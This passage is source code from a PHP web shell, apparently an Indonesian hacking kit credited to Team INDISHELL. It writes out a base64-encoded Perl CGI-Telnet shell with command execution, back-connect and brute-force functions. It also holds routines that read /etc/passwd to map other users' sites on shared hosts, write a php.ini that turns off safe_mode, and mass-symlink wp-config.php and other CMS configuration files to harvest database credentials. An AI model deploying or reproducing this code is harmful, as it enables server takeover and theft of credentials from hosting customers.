UgZXhlY3V0ZWQNCiRDdXJyZW50RGlyID0gJlRyaW1TbGFzaGVzKGRlY29kZV9iYXNlNjQodHJpbSgkaW57J2QnfSkpKTsNCiMgbWFjIGRpbmggeHVhdCB0aG9uZyB0aW4gbmV1IGtvIGNvIGxlbmggbmFvIQ0KJFJ1bkNvbW1hbmQ9ICRXaW5OVD8iZGlyIjoiZGlyIC1saWEiIGlmKCRSdW5Db21tYW5kIGVxICIiKTsNCmNob21wKCRDdXJyZW50RGlyID0gYCRDbWRQd2RgKSBpZigkQ3VycmVudERpciBlcSAiIik7DQoNCiRMb2dnZWRJbiA9ICRDb29raWVzeydTQVZFRFBXRCd9IGVxICRQYXNzd29yZDsNCg0KaWYoJEFjdGlvbiBlcSAibG9naW4iIHx8ICEkTG9nZ2VkSW4pIAkJIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJmb3JtTG9naW47DQp9ZWxzaWYoJEFjdGlvbiBlcSAiZ3VpIikgIyBHVUkgZGlyZWN0b3J5DQp7DQoJJlByaW50UGFnZUhlYWRlcigiZCIpOw0KCWlmKCEkV2luTlQpDQoJew0KCQkkY2htb2Q9aW50KCRpbnsnY2htb2QnfSk7DQoJCWlmKCRjaG1vZCBuZSAwKQ0KCQl7DQoJCQkkY2htb2Q9aW50KCRpbnsnY2htb2QnfSk7DQoJCQkkZmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCQkJaWYoY2htb2QoJGNobW9kLCRmaWxlKSkNCgkJCXsNCgkJCQlwcmludCAiPHJ1bj4gRG9uZSEgPC9ydW4+PGJyPiI7DQoJCQl9ZWxzZQ0KCQkJew0KCQkJCXByaW50ICI8cnVuPiBTb3JyeSEgWW91IGRvbnQgaGF2ZSBwZXJtaXNzaW9ucyEgPC9ydW4+PGJyPiI7DQoJCQl9DQoJCX0NCgl9DQoJJHJlbmFtZT0kaW57J3JlbmFtZSd9Ow0KCWlmKCRyZW5hbWUgbmUgIiIpDQoJew0KCQlpZihyZW5hbWUoJFRyYW5zZmVyRmlsZSwkcmVuYW1lKSkNCgkJew0KCQkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOw0KCQl9ZWxzZQ0KCQl7DQoJCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOw0KCQl9DQoJfQ0KCSRyZW1vdmU9JGlueydyZW1vdmUnfTsNCglpZigkcmVtb3ZlIG5lICIiKQ0KCXsNCgkJJHJtID0gJEN1cnJlbnREaXIuJFBhdGhTZXAuJHJlbW92ZTsNCgkJaWYoLWQgJHJtKQ0KCQl7DQoJCQkmUm1EaXIoJHJtKTsNCgkJfWVsc2UNCgkJew0KCQkJaWYodW5saW5rKCRybSkpDQoJCQl7DQoJCQkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOw0KCQkJfWVsc2UNCgkJCXsNCgkJCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOw0KCQkJfQkJCQ0KCQl9DQoJfQ0KCXByaW50ICZMaXN0RGlyOw0KDQp9DQplbHNpZigkQWN0aW9uIGVxICJjb21tYW5kIikJCQkJIAkjIHVzZXIgd2FudHMgdG8gcnVuIGEgY29tbWFuZA0Kew0KCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCglwcmludCAmRXhlY3V0ZUNvbW1hbmQ7DQp9DQplbHNpZigkQWN0aW9uIGVxICJzYXZlIikJCQkJIAkjIHVzZXIgd2FudHMgdG8gc2F2ZSBhIGZpbGUNCnsNCgkmUHJpbnRQYWdlSGVhZGVyOw0KCWlmKCZTYXZlRmlsZSgkaW57J2RhdGEnfSwkaW57J2ZpbGUnfSkpDQoJew0KCQlwcmludCAiPHJ1bj4gRG9uZSEgPC9ydW4+PGJyPiI7DQoJfWVsc2UNCgl7DQoJCXByaW50ICI8cnVuPiBTb3JyeSEgWW91IGRvbnQgaGF2ZSBwZXJtaXNzaW9ucyEgPC9ydW4+PGJyPiI7DQoJfQ0KCXByaW50ICZMaXN0RGlyOw0KfWVsc2lmKCRBY3Rpb24gZXEgInVwbG9hZCIpIAkJCQkJIyB1c2VyIHdhbnRzIHRvIHVwbG9hZCBhIGZpbGUNCnsNCgkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJcHJpbnQgJlVwbG9hZEZpbGU7DQp9ZWxzaWYoJEFjdGlvbiBlcSAiYmFja2JpbmQiKSAJCQkJIyB1c2VyIHdhbnRzIHRvIGJhY2sgY29ubmVjdCBvciBiaW5kIHBvcnQNCnsNCgkmUHJpbnRQYWdlSGVhZGVyKCJjbGllbnRwb3J0Iik7DQoJcHJpbnQgJkJhY2tCaW5kOw0KfWVsc2lmKCRBY3Rpb24gZXEgImJydXRlZm9yY2VyIikgCQkJIyB1c2VyIHdhbnRzIHRvIGJydXRlIGZvcmNlDQp7DQoJJlByaW50UGFnZUhlYWRlcjsNCglwcmludCAmQnJ1dGVGb3JjZXI7DQp9ZWxzaWYoJEFjdGlvbiBlcSAiZG93bmxvYWQiKSAJCQkJIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQ0Kew0KCXByaW50ICZEb3dubG9hZEZpbGU7DQp9ZWxzaWYoJEFjdGlvbiBlcSAiY2hlY2tsb2ciKSAJCQkJIyB1c2VyIHdhbnRzIHRvIHZpZXcgbG9nIGZpbGUNCnsNCgkmUHJpbnRQYWdlSGVhZGVyOw0KCXByaW50ICZWaWV3TG9nOw0KDQp9ZWxzaWYoJEFjdGlvbiBlcSAiZG9tYWluc3VzZXIiKSAJCQkjIHVzZXIgd2FudHMgdG8gdmlldyBsaXN0IHVzZXIvZG9tYWluDQp7DQoJJlByaW50UGFnZUhlYWRlcjsNCglwcmludCAmVmlld0RvbWFpblVzZXI7DQp9ZWxzaWYoJEFjdGlvbiBlcSAibG9nb3V0IikgCQkJCSMgdXNlciB3YW50cyB0byBsb2dvdXQNCnsNCgkmUGVyZm9ybUxvZ291dDsNCn0NCiZQcmludFBhZ2VGb290ZXI7';
2852.  
2853. $file = fopen("cgi4e.izo" ,"w+");
2854. $write = fwrite ($file ,base64_decode($cgi4e));
2855. fclose($file);
2856. chmod("cgi4e.izo",0755);
2857. echo "<br><center><span style='font-size:30px; font-family:Fredericka the Great; color:#009900'>CGI-Telnet Version 1.4 </span><br><font face='Tahoma' color='#007700' size='2pt'>Password : BTM</font><center><br><iframe src=cgi4e/cgi4e.izo width=75% height=60% frameborder=0></iframe>
2858.  
2859. </div></center>";
2860. }
2861. elseif($_GET['do'] == 'jumping') {
2862. $i = 0;
2863. echo "<div class='margin: 5px auto;'>";
2864. if(preg_match("/hsphere/", $dir)) {
2865. $urls = explode("\r\n", $_POST['url']);
2866. if(isset($_POST['jump'])) {
2867. echo "<pre>";
2868. foreach($urls as $url) {
2869. $url = str_replace(array("http://","www."), "", strtolower($url));
2870. $etc = "/etc/passwd";
2871. $f = fopen($etc,"r");
2872. while($gets = fgets($f)) {
2873. $pecah = explode(":", $gets);
2874. $user = $pecah[0];
2875. $dir_user = "/hsphere/local/home/$user";
2876. if(is_dir($dir_user) === true) {
2877. $url_user = $dir_user."/".$url;
2878. if(is_readable($url_user)) {
2879. $i++;
2880. $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
2881. if(is_writable($url_user)) {
2882. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
2883. }
2884. echo $jrw."<br>";
2885. }
2886. }
2887. }
2888. }
2889. if($i == 0) {
2890. } else {
2891. echo "<br>Total ada ".$i." Kamar di ".$ip;
2892. }
2893. echo "</pre>";
2894. } else {
2895. echo '<center>
2896. <form method="post">
2897. List Domains: <br>
2898. <textarea name="url" style="width: 500px; height: 250px;">';
2899. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
2900. while($getss = fgets($fp)) {
2901. echo $getss;
2902. }
2903. echo '</textarea><br>
2904. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
2905. </form></center>';
2906. }
2907. } elseif(preg_match("/vhosts|vhost/", $dir)) {
2908. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
2909. $urls = explode("\r\n", $_POST['url']);
2910. if(isset($_POST['jump'])) {
2911. echo "<pre>";
2912. foreach($urls as $url) {
2913. $url = str_replace("www.", "", $url);
2914. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
2915. if(is_dir($web_vh) === true) {
2916. if(is_readable($web_vh)) {
2917. $i++;
2918. $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
2919. if(is_writable($web_vh)) {
2920. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
2921. }
2922. echo $jrw."<br>";
2923. }
2924. }
2925. }
2926. if($i == 0) {
2927. } else {
2928. echo "<br>Total ada ".$i." Kamar di ".$ip;
2929. }
2930. echo "</pre>";
2931. } else {
2932. echo '<center>
2933. <form method="post">
2934. List Domains: <br>
2935. <textarea name="url" style="width: 500px; height: 250px;">';
2936. bing("ip:$ip");
2937. echo '</textarea><br>
2938. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
2939. </form></center>';
2940. }
2941. } else {
2942. echo "<pre>";
2943. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
2944. while($passwd = fgets($etc)) {
2945. if($passwd == '' || !$etc) {
2946. echo "<font color=red>Can't read /etc/passwd</font>";
2947. } else {
2948. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
2949. foreach($user_jumping[1] as $user_idx_jump) {
2950. $user_jumping_dir = "/home/$user_idx_jump/public_html";
2951. if(is_readable($user_jumping_dir)) {
2952. $i++;
2953. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
2954. if(is_writable($user_jumping_dir)) {
2955. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
2956. }
2957. echo $jrw;
2958. if(function_exists('posix_getpwuid')) {
2959. $domain_jump = file_get_contents("/etc/named.conf");
2960. if($domain_jump == '') {
2961. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
2962. } else {
2963. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
2964. foreach($domains_jump[1] as $dj) {
2965. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
2966. $user_jumping_url = $user_jumping_url['name'];
2967. if($user_jumping_url == $user_idx_jump) {
2968. echo " => ( <u>$dj</u> )<br>";
2969. break;
2970. }
2971. }
2972. }
2973. } else {
2974. echo "<br>";
2975. }
2976. }
2977. }
2978. }
2979. }
2980. if($i == 0) {
2981. } else {
2982. echo "<br>Total ada ".$i." Kamar di ".$ip;
2983. }
2984. echo "</pre>";
2985. }
2986. echo "</div>";
2987. }
2988. elseif($_GET['do'] == 'indi') {
2989. echo "<center>";
2990. echo "<ul>";
2991. echo "<li> <a href='?dir=$dir&do=config'>Config</a> </li>";
2992. echo "<li> <a href='?dir=$dir&do=config2'>2nd Config</a> </li>";
2993. echo "<li> <a href='?dir=$dir&do=indi'>INDISHELL</a> </li>";
2994. echo "<li> <a href='?dir=$dir&do=vgrab'>VHosts Grabber</a> </li>";
2995. echo "</ul>";
2996. echo "</center>";
2997. $byphp = "safe_mode = Off
2998. disable_functions = None
2999. ";
3000. file_put_contents("php.ini",$byphp);
3001.  
3002. echo '<CENTER><b>Configuration Killer By Team INDISHELL</b><br><br>';
3003. ?>
3004.  
3005. <bR><form method=post>
3006. <textarea style='width: 543px; height: 420px;' name=user><?php $users=file("/etc/passwd");
3007. foreach($users as $user)
3008. {
3009. $str=explode(":",$user);
3010. echo $str[0]."\n";
3011. }
3012.  
3013. ?></textarea><br>
3014. <input type=submit name=su value="Lets Start" /></form></CENTER>
3015. <center>
3016. <?php
3017. error_reporting(0);
3018. echo "<font color=#ff00 size=2 face=\"comic sans ms\">";
3019. if(isset($_POST['su']))
3020. {
3021. mkdir('lol',0777);
3022. $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
3023. $g = fopen('lol/.htaccess','w');
3024. fwrite($g,$rr);
3025. $indishell = symlink("/","lol/root");
3026. $rt="<a href=lol/root target='_blank'><font color=white size=3 face=\"comic sans ms\"> OwN3d</font></a>";
3027. echo "Please check link given below for / folder symlink <br><u>$rt</u>";
3028.  
3029. $dir=mkdir('BTM',0777);
3030. $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
3031. $f = fopen('INJECTION/.htaccess','w');
3032.  
3033. fwrite($f,$r);
3034. $consym="<a href=BTM/ target='_blank'><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
3035. echo "<br>The link given below for configuration file symlink...open it, once processing finish <br><u><font color=white size=2 face=\"comic sans ms\">$consym<br><br></font></u>";
3036.  
3037. $usr=explode("\n",$_POST['user']);
3038. $configuration=array("wp-config.php",
3039. "wordpress/wp-config.php",
3040. "web/wp-config.php",
3041. "wp/wp-config.php",
3042. "press/wp-config.php",
3043. "wordpress/beta/wp-config.php",
3044. "news/wp-config.php",
3045. "new/wp-config.php",
3046. "blogs/wp-config.php",
3047. "home/wp-config.php",
3048. "blog/wp-config.php",
3049. "protal/wp-config.php",
3050. "site/wp-config.php",
3051. "main/wp-config.php",
3052. "test/wp-config.php",
3053. "wp/beta/wp-config.php",
3054. "beta/wp-config.php",
3055. "joomla/configuration.php",
3056. "protal/configuration.php",
3057. "joo/configuration.php",
3058. "cms/configuration.php",
3059. "site/configuration.php",
3060. "main/configuration.php",
3061. "news/configuration.php",
3062. "new/configuration.php",
3063. "home/configuration.php",
3064. "configuration.php",
3065. "SSI.php",
3066. "forum/SSI.php",
3067. "forum/inc/config.php",
3068. "forum/includes/config.php",
3069. "upload/includes/config.php",
3070. "cc/includes/config.php",
3071. "vb/includes/config.php",
3072. "vb3/includes/config.php",
3073. "cpanel/configuration.php",
3074. "panel/configuration.php",
3075. "ubmitticket.php",
3076. "manage/configuration.php",
3077. "myshop/configuration.php",
3078. "beta/configuration.php",
3079. "includes/config.php",
3080. "lib/config.php",
3081. "conf_global.php",
3082. "inc/config.php",
3083. "incl/config.php",
3084. "include/db.php",
3085. "include/config.php",
3086. "includes/functions.php",
3087. "includes/dist-configure.php",
3088. "connect.php",
3089. "mk_conf.php",
3090. "config/koneksi.php",
3091. "system/sistem.php",
3092. "config.php",
3093. "Settings.php",
3094. "settings.php",
3095. "sites/default/settings.php",
3096. "smf/Settings.php",
3097. "forum/Settings.php",
3098. "forums/Settings.php",
3099. "host/configuration.php",
3100. "hosting/configuration.php",
3101. "hosts/configuration.php",
3102. "zencart/includes/dist-configure.php",
3103. "shop/includes/dist-configure.php",
3104. "whm/configuration.php",
3105. "whmc/configuration.php",
3106. "whmcs/configuration.php",
3107. "whmc/WHM/configuration.php",
3108. "whm/WHMCS/configuration.php",
3109. "whm/whmcs/configuration.php",
3110. "order/configuration.php",
3111. "support/configuration.php",
3112. "supports/configuration.php",
3113. "oscommerce/includes/configure.php",
3114. "oscommerces/includes/configure.php",
3115. "shopping/includes/configure.php",
3116. "sale/includes/configure.php",
3117. "config.inc.php",
3118. "amember/config.inc.php",
3119. "clients/configuration.php",
3120. "client/configuration.php",
3121. "clientes/configuration.php",
3122. "cliente/configuration.php",
3123. "clientsupport/configuration.php",
3124. "billing/configuration.php",
3125. "billings/configuration.php",
3126. "admin/conf.php",
3127. "admin/config.php");
3128. foreach($usr as $uss )
3129. {
3130. $us=trim($uss);
3131.  
3132. foreach($configuration as $c)
3133. {
3134. $rs="/home/".$us."/public_html/".$c;
3135. $r="BTM/".$us." .. ".$c;
3136. symlink($rs,$r);
3137.  
3138. }
3139.  
3140. }
3141.  
3142.  
3143. }
3144.  
3145. }
3146. elseif($_GET['do'] == 'tconf') {
3147. echo "<center>";
3148. echo "<ul>";
3149. echo "<li> <a href='?dir=$dir&do=config'>Config</a> </li>";
3150. echo "<li> <a href='?dir=$dir&do=config2'>2nd Config</a> </li>";
3151. echo "<li> <a href='?dir=$dir&do=indi'>INDISHELL</a> </li>";
3152. echo "<li> <a href='?dir=$dir&do=vgrab'>VHosts Grabber</a> </li>";
3153. echo "</ul>";
3154. echo "</center>";
3155. }
3156. elseif($_GET['do'] == 'vgrab') {
3157. echo "<center>";
3158. echo "<ul>";
3159. echo "<li> <a href='?dir=$dir&do=config'>Config</a> </li>";
3160. echo "<li> <a href='?dir=$dir&do=config2'>2nd Config</a> </li>";
3161. echo "<li> <a href='?dir=$dir&do=indi'>INDISHELL</a> </li>";
3162. echo "<li> <a href='?dir=$dir&do=vgrab'>VHosts Grabber</a> </li>";
3163. echo "</ul>";
3164. echo "</center>";
3165.  
3166. echo"<br><center><form method='post'>
3167. <input type='submit' name='elgass' value='Click Here'>
3168. </form></center>";
3169.  
3170. if (isset($_POST['elgass']))
3171. {
3172. @mkdir('btbt', 0755);
3173. @chdir('btbt');
3174. $elesem = ".htaccess";
3175. $elakab = "$elesem";
3176. $filhat = fopen ($elakab , 'w') or die ("Can't Write htaccess !");
3177. $htcont = "Options FollowSymLinks MultiViews Indexes ExecCGI
3178.  
3179. AddType application/x-httpd-cgi .cin
3180.  
3181. AddHandler cgi-script .cin
3182. AddHandler cgi-script .cin";
3183. fwrite ( $filhat , $htcont ) ;
3184. fclose ($filhat);
3185. $btm = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxubiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29udGVudD0iZW4tdXMiIC8+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4NCjwvaGVhZD4NCic7DQoNCg0KcHJpbnQgJw0KPGJvZHk+DQo8cD4uOiBDb2RlZCBieSBGYWxsYWcgR2Fzc3Jpbmk8L3A+DQonOw0Kb3BlbmRpcihteSAkZGlyICwgIi92YXIvd3d3L3Zob3N0cy8iKTsNCmZvcmVhY2goc29ydCByZWFkZGlyICRkaXIpIHsNCiAgICBteSAkaXNEaXIgPSAwOw0KICAgICRpc0RpciA9IDEgaWYgLWQgJF87DQokc2l0ZXNzID0gJF87DQoNCg0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLW9zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1vc2NvbS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9vc2NvbW1lcmNlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1vc2NvbW1lcmNlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2VzL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1vc2NvbW1lcmNlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaG9wL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaG9wcGluZy9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1zaG9wcGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zYWxlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FtZW1iZXIvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy5pbmMucGhwJywkc2l0ZXNzLictYW1lbWJlcjIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLW1lbWJlcnMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLnBocCcsJHNpdGVzcy4nLTRpbWFnZXMxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1mb3J1bS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bXMvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25mLnBocCcsJHNpdGVzcy4nLTUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYWRtaW4vY29uZmlnLnBocCcsJHNpdGVzcy4nLTQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dQL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd3AvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JldGEvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy1wcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9Xb3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXdzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmxvZy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2cudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJldGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmxvZ3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ibG9ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob21lL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wcm90YWwvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1wcm90YWwudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2l0ZS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW1haW4udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvdGVzdC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXRlc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FyY2FkZS9mdW5jdGlvbnMvZGJjbGFzcy5waHAnLCRzaXRlc3MuJy1pYnByb2FyY2FkZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1wcm90YWwudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvam9vL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Ntcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpv